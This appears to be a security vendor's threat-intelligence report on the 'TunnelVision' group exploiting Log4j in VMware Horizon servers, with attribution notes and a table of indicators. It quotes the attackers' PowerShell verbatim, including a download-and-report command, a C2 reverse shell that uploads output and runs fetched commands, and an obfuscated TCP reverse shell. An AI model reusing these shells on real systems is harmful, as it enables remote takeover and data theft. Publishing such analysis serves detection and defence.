By Amitai Ben Shushan Ehrlich and Yair Rigevsky
TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell) and recently Log4Shell. In almost all of those cases, the threat actor deployed a tunneling tool wrapped in a unique fashion. The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.
TunnelVision activities are correlated to some extent with parts of Microsoft’s Phosphorus, as discussed further in the Attribution section.
In this post, we highlight some of the activities we recently observed from TunnelVision operators, focusing around exploitation of VMware Horizon Log4j vulnerabilities.
The exploitation of Log4j in VMware Horizon is characterized by a malicious process spawned from the Tomcat service of the VMware product (C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe
).
TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement.
Typically, the threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then runs further commands by means of PS reverse shells, executed via the Tomcat process.
TunnelVision operators exploited the Log4j vulnerability in VMware Horizon to run PowerShell commands, sending outputs back utilizing a webhook. In this example, the threat actor attempted to download ngrok to a compromised VMware Horizon server:
try{ (New-Object System.Net.WebClient).DownloadFile("hxxp://transfer.sh/uSeOFn/ngrok.exe","C:\\Users\Public\public.exe"); Rename-Item 'c://Users//public//new.txt' 'microsoft.exe'; $a=iex 'dir "c://Users//public//"' | Out-String; iwr -method post -body $a https://webhook.site/{RANDOM-GUID} -UseBasicParsing; }catch{ iwr -method post -body $Error[0] https://webhook.site/{RANDOM-GUID} -UseBasicParsing; }
Throughout the activity the usage of multiple legitimate services was observed. Given an environment is compromised by TunnelVision, it might be helpful to look for outbound connections to any of those legitimate public services:
$c = "" $p = "" $r = "" $u = "hxxps://www.microsoft-updateserver.cf/gadfTs55sghsSSS" $wc = New-Object System.Net.WebClient $li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0]; $c = "whoami" $c = 'Write-Host " ";'+$c $r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li" $ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li") while($true) { $c = $wc.DownloadString("$u/$env:COMPUTERNAME-$li/123.txt") $c = 'Write-Host " ";'+$c if($c -ne $p) { $r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li" $p = $c $ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li") } sleep 3 }
Reverse Shell #1 was used in the past by TunnelVision operators (7feb4d36a33f43d7a1bb254e425ccd458d3ea921), utilizing a different C2 server: “hxxp://google.onedriver-srv.ml/gadfTs55sghsSSS”. This C2 was referenced in several articles analyzing TunnelVision activities.
Throughout the activity the threat actor leveraged another domain, service-management[.]tk
, used to host malicious payloads. According to VirusTotal, this domain was also used to host a zip file (d28e07d2722f771bd31c9ff90b9c64d4a188435a) containing a custom backdoor (624278ed3019a42131a3a3f6e0e2aac8d8c8b438).
The backdoor drops an additional executable file (e76e9237c49e7598f2b3f94a2b52b01002f8e862) to %ProgramData%\Installed Packages\InteropServices.exe
and registers it as a service named “InteropServices”.
The dropped executable contains an obfuscated version of the reverse shell as described above, beaconing to the same C2 server (www[.]microsoft-updateserver[.]cf
). Although it is not encrypted, it is deobfuscated and executed in a somewhat similar manner to how PowerLess, another backdoor used by the group, executes its PowerShell payload.
$hst = "51.89.135.142"; $prt = 443; function watcher() {; $limit = (Get - Random - Minimum 3 - Maximum 7); $stopWatch = New - Object - TypeName System.Diagnostics.Stopwatch; $timeSpan = New - TimeSpan - Seconds $limit; $stopWatch.Start(); while ((($stopWatch.Elapsed).TotalSeconds - lt $timeSpan.TotalSeconds) ) {}; $stopWatch.Stop(); }; watcher; $arr = New - Object int[] 500; for ($i = 0; $i - lt 99; $i++) {; $arr[$i] = (Get - Random - Minimum 1 - Maximum 25); }; if ($arr[0] - gt 0) {; $valksdhfg = New - Object System.Net.Sockets.TCPClient($hst, $prt); $banljsdfn = $valksdhfg.GetStream(); [byte[]]$bytes = 0..65535|% { 0 }; while (($i = $banljsdfn.Read($bytes, 0, $bytes.Length)) - ne 0) {; $lkjnsdffaa = (New - Object - TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $nsdfgsahjxx = (&(gcm('*ke-exp*')) $lkjnsdffaa 2 > &1 | Out - String ); $nsdfgsahjxx2 = $nsdfgsahjxx + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($nsdfgsahjxx2); $banljsdfn.Write($sendbyte, 0, $sendbyte.Length); $banljsdfn.Flush(); watcher }; $valksdhfg.Close(); };
Most of the “online” activities we observed were performed from this PowerShell backdoor. It seems to be a modified variant of a publicly available PowerShell one-liner.
Among those activities were:
Throughout the activity, the threat actor utilized a github repository “VmWareHorizon” of an account owned by the threat actor, using the name “protections20”.
TunnelVision activities have been discussed previously and are tracked by other vendors under a variety of names, such as Phosphorus (Microsoft) and, confusingly, either Charming Kitten or Nemesis Kitten (CrowdStrike).
This confusion arises since activity that Microsoft recognizes as a single group, “Phosphorous”, overlaps with activity that CrowdStrike distinguishes as belonging to two different actors, Charming Kitten and Nemesis Kitten.
We track this cluster separately under the name “TunnelVision”. This does not imply we believe they are necessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the aforementioned attributions.
TYPE | INDICATOR | NOTES |
Domain | www[.]microsoft-updateserver[.]cf | Command and Control (C2) Server |
Domain | www[.]service-management[.]tk | Payload server |
IP | 51.89.169[.]198 | Command and Control (C2) Server |
IP | 142.44.251[.]77 | Command and Control (C2) Server |
IP | 51.89.135[.]142 | Command and Control (C2) Server |
IP | 51.89.190[.]128 | Command and Control (C2) Server |
IP | 51.89.178[.]210 | Command and Control (C2) Server, Tunneling Server |
IP | 142.44.135[.]86 | Tunneling Server |
IP | 182.54.217[.]2 | Payload Server |
Github Account | https://github.com/protections20 | Account utilized to host payloads |